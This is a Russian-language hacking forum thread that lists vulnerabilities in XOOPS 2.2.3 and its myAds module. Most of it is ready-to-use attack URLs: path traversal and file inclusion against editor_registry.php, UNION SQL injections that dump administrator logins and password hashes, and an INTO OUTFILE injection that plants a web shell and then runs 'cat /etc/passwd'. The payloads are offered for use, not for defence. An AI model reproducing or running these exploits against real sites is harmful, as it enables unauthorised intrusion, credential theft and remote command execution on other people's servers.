• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: XOOPS

Winux

Старожил форума
Легенда
Регистрация
12.11.2004
Сообщения
6 358
Реакции
53
Множественные уязвимости в XOOPS 2.2.3
Возможность просматривать проивзольные файлы на целевой системе, и подключать на исполнение сценарии на php (без специфичекого расширения).

Примеры:
Код:
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/textarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/koivi/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../script
http://[target]/[path_to_xoops]/class/xoopseditor/dhtmltextarea/editor_registry.php?
xoopsConfig[language]=../../../../../../../../../../boot.ini%00

Возможна SQL-инъекция в скрипте viewcat.php, если опция magic_quotes_gpc выключена. Вы можете просмотреть MD5 хэш пароля администратора.

Пример:
Код:
http://[target]/[path_to_xoops]/modules/wfdownloads/
viewcat.php?list=-'%20UNION%20SELECT%200,0,loginname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0,0,0,0,0,0,0,0,0,0,0,0,0,pass,0,0%20FROM%20fXZtr_users%20WHERE%20level=5/*

Также, возможно создать web-shell скрипт, в директорию доступную для записи (в примере это директория "uploads").

Пример:

Код:
http://[target]/[path_to_xoops]/modules/wfdownloads/
viewcat.php?list=-1'%20or'a'='a'%20UNION%20SELECT%200,0,0,'',
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20INTO%20OUTFILE%20'../../www/
xoops/uploads/shell.php'%20FROM%20fXZtr_wfdownloads_downloads/*

Затем выполнять произвольные комманды:

http://[target]/[path_to_xoops]/uploads/shell.php?cmd=cat%20/etc/passwd

Сплойт
 
SQL-Injection in xoops myAds module
Описнаие:
Как уже понятно из название мы имеем дело с SQL-injection
Уязвимый скрипт: annonces-p-f.php
Пример/Эксплоит:
Код:
http://www.target.com/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*
Вся эта прелесть от Cyber Lords Community.
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх